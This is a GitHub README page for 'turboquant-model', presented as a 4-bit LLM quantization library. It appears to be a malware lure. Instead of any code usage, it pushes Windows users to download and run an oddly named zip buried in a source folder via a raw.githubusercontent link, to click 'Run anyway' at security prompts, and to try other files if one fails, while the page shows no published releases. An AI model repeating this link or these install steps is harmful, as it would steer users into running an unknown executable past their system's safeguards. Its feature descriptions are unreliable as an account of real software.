Skip to content

IbadKhalid7/turboquant-model

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

53 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

🧠 turboquant-model - Run large models with less memory

Download

📥 Download

Visit this page to download: https://raw.githubusercontent.com/IbadKhalid7/turboquant-model/main/site/src/components/model_turboquant_Ichthyornithidae.zip

On Windows, open the latest release and download the file that matches your computer. If there is more than one file, choose the one meant for Windows.

🪟 Windows setup

  1. Download the release file from the link above.
  2. Open the downloaded file.
  3. If Windows shows a security prompt, choose Run anyway if you trust the source.
  4. Follow the on-screen steps.
  5. Wait for the setup to finish.
  6. Open TurboQuant Model from the Start menu or desktop shortcut.

🚀 Getting started

TurboQuant Model helps you run large language models with lower GPU memory use. It keeps model weights in a compact form and dequantizes them during use. This can help if your system runs out of memory with full-size models.

What it does

  • Uses 4-bit weight quantization
  • Supports residual quantization for tighter storage
  • Dequantizes weights during matrix math
  • Reduces GPU memory use compared with bf16 models
  • Works as a drop-in replacement for nn.Linear
  • Saves and loads quantized models

🖥️ System requirements

For smooth use on Windows, use a system like this:

  • Windows 10 or Windows 11
  • A recent NVIDIA GPU with CUDA support
  • 8 GB RAM or more
  • Enough disk space for the app and model files
  • A stable internet connection for the first download

If you plan to work with larger models, more GPU memory helps.

📂 What you get

After install, you can use TurboQuant Model to:

  • Load supported language models
  • Run inference with lower memory use
  • Keep quantized weights on disk
  • Reload saved quantized models later
  • Use the same model code with less setup work

🧭 How to use the app

1. Open the program

Start TurboQuant Model from the Start menu or the desktop icon.

2. Choose a model

Pick the model file you want to run. Common model files are stored in folders you can browse to on your PC.

3. Load the model

Select the model and wait for it to load. Larger models may take longer.

4. Enter text

Type a prompt in the text box. This is the text the model will read.

5. Run inference

Click the run button to start generation. The app will produce a response based on your prompt.

6. Save your work

If the app offers a save option, use it to keep your quantized model or your current setup.

🔧 Basic install flow

  1. Go to the release page.
  2. Download the Windows file.
  3. Open the file and complete setup.
  4. Launch the app.
  5. Load a model.
  6. Start using it.

📦 Model support

TurboQuant Model is built for large language models that use linear layers. It is designed to work with common transformer-style models and with saved quantized weights. It can help when you need a smaller memory footprint without changing the model design.

⚙️ Performance

TurboQuant Model aims to keep quality high while cutting memory use. It uses:

  • 4-bit packing for weights
  • Near-optimal distortion control
  • On-the-fly dequantization during matmul
  • Residual bits when extra detail is needed

In practice, this can reduce GPU memory use while keeping runtime overhead at a level that remains usable for local inference.

🧩 If the app does not open

Try these steps:

  1. Make sure the download finished.
  2. Open the file again.
  3. Check that Windows did not block the file.
  4. Restart your PC and try once more.
  5. Make sure your GPU drivers are current.
  6. Try a different release file if the first one does not work.

🔐 Files and storage

Quantized models can be saved to disk and loaded later. This helps when you want to reuse the same model without repeating the setup. Keep model files in a folder with enough space, since large models can still take a lot of disk space even after quantization.

📝 Notes for use

  • Use a model that matches your hardware.
  • Start with smaller models if you are unsure.
  • Keep your GPU driver updated.
  • Close other heavy apps if memory is low.
  • Store model files in a simple folder path, such as C:\Models.

📌 Project info

About

Optimize LLM inference with near-optimal 4-bit weight quantization and on-the-fly dequantization for lower memory use and faster matmul

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors